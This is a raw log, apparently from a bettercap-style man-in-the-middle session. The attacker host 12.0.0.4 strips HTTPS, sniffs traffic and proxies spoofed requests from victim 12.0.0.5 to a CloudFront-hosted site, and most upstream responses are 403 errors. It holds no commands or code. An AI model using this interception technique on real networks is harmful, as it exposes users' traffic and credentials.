 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35426
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/b7e8ae700922f44a87cf9bfa816f47f3/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-display/aa4aa85c7ef84dd4cb06bba4cd08a1b6/Charlie_Di...
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/42fcf8750a4eb107bc7abd7015b8cc87/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35414
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:13.650690439 +0200 CEST m=+40.634800561 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.671050014 +0200 CEST m=+40.655160112 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/f7510eaae5eb4e52cf90295b6a217659/Charlie_Text-Semibold.woff 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:13.682264954 +0200 CEST m=+40.666375051 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.685656836 +0200 CEST m=+40.669766959 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35408
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.692548517 +0200 CEST m=+40.676658635 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:13.972783786 +0200 CEST m=+40.956893896 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:13.980815537 +0200 CEST m=+40.964925657 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35400
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35406
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.005682928 +0200 CEST m=+40.989793041 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.031490418 +0200 CEST m=+41.015600518 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/3f276bfa8963485680427956e6020c3b/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/f7510eaae5eb4e52cf90295b6a217659/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.10807314 +0200 CEST m=+41.092183276 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/3f276bfa8963485680427956e6020c3b/Charlie_Text-Bold.woff 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35424
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.121451791 +0200 CEST m=+41.105561914 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/cea56906f1c28c0630dd984d4bfad569/Charlie_Text-Bold.woff2 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.138645907 +0200 CEST m=+41.122756033 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35416
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.146884848 +0200 CEST m=+41.130994965 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.182261622 +0200 CEST m=+41.166371741 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-display/aa4aa85c7ef84dd4cb06bba4cd08a1b6/Charlie_Display-Semibold.woff 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35418
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.232265291 +0200 CEST m=+41.216375450 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/42fcf8750a4eb107bc7abd7015b8cc87/Charlie_Text-Light.woff 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.241046731 +0200 CEST m=+41.225156841 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-display/5df3e495e418541d4ee58565d65300a3/Charlie_Display-Semibold.woff2 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.252530889 +0200 CEST m=+41.236641010 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.269066958 +0200 CEST m=+41.253177081 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/f7510eaae5eb4e52cf90295b6a217659/Charlie_Text-Semibold.woff 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35412
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35426
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35420
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.318253373 +0200 CEST m=+41.302363502 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/b7e8ae700922f44a87cf9bfa816f47f3/Charlie_Text-Regular.woff 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35422
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.347944868 +0200 CEST m=+41.332054999 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/1c6e2a15a0f304ec8bef45481a75a07c/Charlie_Text-Semibold.woff2 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.36222155 +0200 CEST m=+41.346331685 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.373005033 +0200 CEST m=+41.357115159 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35406
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35408
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.403480077 +0200 CEST m=+41.387590199 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.411487212 +0200 CEST m=+41.395597343 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.422623715 +0200 CEST m=+41.406733831 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/cea56906f1c28c0630dd984d4bfad569/Charlie_Text-Bold.woff2 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35400
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.430032846 +0200 CEST m=+41.414142972 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/d6815c1054ecf22dcdb4e6f6f2a37141/Charlie_Text-Light.woff2 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.560036619 +0200 CEST m=+41.544146728 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.557787411 +0200 CEST m=+41.541897521 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/b2fe1098e251238a45ea8d199d04723e/Charlie_Text-Regular.woff2 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.566212259 +0200 CEST m=+41.550322403 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.571715512 +0200 CEST m=+41.555825626 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/87c23234a3807e474d70ea3ab47bd8dc/user-1.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35416
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-display/5df3e495e418541d4ee58565d65300a3/Charlie_Di...
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/cea56906f1c28c0630dd984d4bfad569/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.737241945 +0200 CEST m=+41.721352083 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/8022b0b4f4360ba3f737c48cd908e448/user-2.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35414
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.75519442 +0200 CEST m=+41.739304535 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/d6815c1054ecf22dcdb4e6f6f2a37141/Charlie_Text-Light.woff2 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/pattern-library/images/87c23234a3807e474d70ea3ab47bd8dc/user-1.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/pattern-library/images/8022b0b4f4360ba3f737c48cd908e448/user-2.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/pattern-library/images/5788b03f8281e4d0d993f95d97c6265f/user-3.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.956307697 +0200 CEST m=+41.940417825 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/1c6e2a15a0f304ec8bef45481a75a07c/Charlie_Text-Semibold.woff2 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/d6815c1054ecf22dcdb4e6f6f2a37141/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/1c6e2a15a0f304ec8bef45481a75a07c/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/b2fe1098e251238a45ea8d199d04723e/Charlie_Text-...
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:14.978031583 +0200 CEST m=+41.962141660 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-display/5df3e495e418541d4ee58565d65300a3/Charlie_Display-Semibold.woff2 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/d5a49602b492398e848bdd7d14a60a23/card-surfing-lessons.jpg
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.981746387 +0200 CEST m=+41.965856513 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/5788b03f8281e4d0d993f95d97c6265f/user-3.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:14] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:14.996223904 +0200 CEST m=+41.980334057 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/d5a49602b492398e848bdd7d14a60a23/card-surfing-lessons.jpg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:15.006366589 +0200 CEST m=+41.990476723 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/79108507bf0ec067873590ceb530a5aa/card-tiki-drinks.jpg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35412
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.043483504 +0200 CEST m=+42.027593624 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.074248675 +0200 CEST m=+42.058358817 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/8022b0b4f4360ba3f737c48cd908e448/user-2.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35408
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.092239346 +0200 CEST m=+42.076349456 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/b2fe1098e251238a45ea8d199d04723e/Charlie_Text-Regular.woff2 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/79108507bf0ec067873590ceb530a5aa/card-tiki-drinks.jpg
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/cabe2460fbe75764c50f9adff950be00/board-back.jpg
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.148453154 +0200 CEST m=+42.132563232 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/87c23234a3807e474d70ea3ab47bd8dc/user-1.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:15.149946944 +0200 CEST m=+42.134057042 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35406
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:15.153106051 +0200 CEST m=+42.137216159 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/cabe2460fbe75764c50f9adff950be00/board-back.jpg 0}}
